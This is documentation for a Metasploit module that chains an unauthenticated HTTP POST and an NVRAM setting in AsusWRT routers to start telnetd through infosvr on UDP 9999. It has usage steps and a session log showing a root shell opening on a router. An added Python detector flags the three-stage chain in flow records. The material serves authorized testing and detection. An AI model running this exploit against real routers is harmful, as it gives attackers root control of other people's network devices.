## Description
This module exploits a vulnerability in AsusWRT to execute arbitrary commands as `root`.
## Vulnerable Application
The HTTP server in AsusWRT has a flaw that allows an unauthenticated client to perform an HTTP `POST` in certain cases. This can be combined with a second vulnerability in the VPN configuration upload routine, which sets NVRAM configuration variables directly from the `POST` request, to enable a special command mode.
This command mode can then be abused by sending a UDP packet to the infosvr service, which listens on UDP port 9999 on the LAN interface, to launch the Telnet daemon on a random port and gain an interactive remote shell as the `root` user.
This module was tested successfully with a RT-AC68U running AsusWRT version 3.0.0.4.380.7743.
Numerous ASUS models are reportedly affected, but untested.
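As an added, defender-side example (not part of the module or its documentation), the following Python correlates the three stages of the chain described above in flow records: HTTP to the router, a UDP datagram to infosvr on 9999, then a new TCP connection to a non-standard high port where the freshly started telnetd listens. The flow record layout and the 60-second window are assumptions.

```python
"""Correlate the three stages of the AsusWRT chain described above in flow
records: HTTP to the router, a UDP datagram to infosvr on 9999, then a new TCP
connection to a non-standard high port (the freshly started telnetd)."""
from dataclasses import dataclass
from typing import Dict, List, Optional

INFOSVR_PORT = 9999  # UDP service abused to start telnetd (from the page)
HTTP_PORT = 80       # module default for ASUSWRTPORT
WINDOW_S = 60.0      # max seconds from HTTP request to shell connect (assumed)


@dataclass(frozen=True)
class Flow:          # simplified flow record; the layout is an assumption
    ts: float        # seconds since epoch
    src: str
    dst: str
    proto: str       # "tcp" or "udp"
    dport: int


def detect_chain(flows: List[Flow], router: str,
                 http_port: int = HTTP_PORT) -> Optional[Dict]:
    """Return the first source completing all three stages in order against
    `router` within WINDOW_S, else None. Order matters: a lone UDP/9999
    datagram is ordinary ASUS device-discovery traffic, not an attack."""
    stages: Dict[str, Dict[str, Optional[float]]] = {}
    for f in sorted(flows, key=lambda x: x.ts):
        if f.dst != router:
            continue
        st = stages.setdefault(f.src, {"http": None, "udp": None})
        if f.proto == "tcp" and f.dport == http_port:
            st["http"] = f.ts                    # stage 1: unauthenticated POST
        elif (f.proto == "udp" and f.dport == INFOSVR_PORT
              and st["http"] is not None):
            st["udp"] = f.ts                     # stage 2: infosvr trigger
        elif (f.proto == "tcp" and f.dport >= 1024 and st["udp"] is not None
              and f.ts - st["http"] <= WINDOW_S):
            return {"src": f.src, "shell_port": f.dport,  # stage 3: shell
                    "http_ts": st["http"], "udp_ts": st["udp"], "tcp_ts": f.ts}
    return None


# Constructed sample flows mirroring the session in the Scenarios section.
SAMPLE = [
    Flow(1000.0, "192.168.135.111", "192.168.132.205", "tcp", 80),
    Flow(1001.0, "192.168.135.111", "192.168.132.205", "udp", 9999),
    Flow(1011.0, "192.168.135.111", "192.168.132.205", "tcp", 51332),
    Flow(1020.0, "192.168.135.50", "192.168.132.205", "tcp", 80),  # admin login
]
```

Calling `detect_chain(SAMPLE, "192.168.132.205")` flags `192.168.135.111` with `shell_port` 51332, while an administrator who only browses the web UI produces no alert.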
## Verification Steps
1. Start `msfconsole`
2. `use exploit/linux/http/asuswrt_lan_rce`
3. `set RHOST [IP]`
4. `run`
5. You should get a *root* session
## Options
**ASUSWRTPORT**
AsusWRT HTTP portal port (default: `80`)
## Scenarios

```
msf > use exploit/linux/http/asuswrt_lan_rce
msf exploit(linux/http/asuswrt_lan_rce) > set rhost 192.168.132.205
rhost => 192.168.132.205
msf exploit(linux/http/asuswrt_lan_rce) > run

[+] 192.168.132.205:9999 - Successfully set the ateCommand_flag variable.
[*] 192.168.132.205:9999 - Packet sent, let's sleep 10 seconds and try to connect to the router on port 51332
[+] 192.168.132.205:9999 - Success, shell incoming!
[*] Found shell.
[*] Command shell session 1 opened (192.168.135.111:36597 -> 192.168.132.205:51332) at 2018-01-25 14:51:12 -0600

id
id
/bin/sh: id: not found
/ # cat /proc/cpuinfo
cat /proc/cpuinfo
system type : Broadcom BCM53572 chip rev 1 pkg 8
processor : 0
cpu model : MIPS 74K V4.9
BogoMIPS : 149.91
wait instruction : no
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : no
hardware watchpoint : yes
ASEs implemented : mips16 dsp
shadow register sets : 1
VCED exceptions : not available
VCEI exceptions : not available

unaligned_instructions : 0
dcache hits : 2147483648
dcache misses : 0
icache hits : 2147483648
icache misses : 0
instructions : 2147483648
/ #
```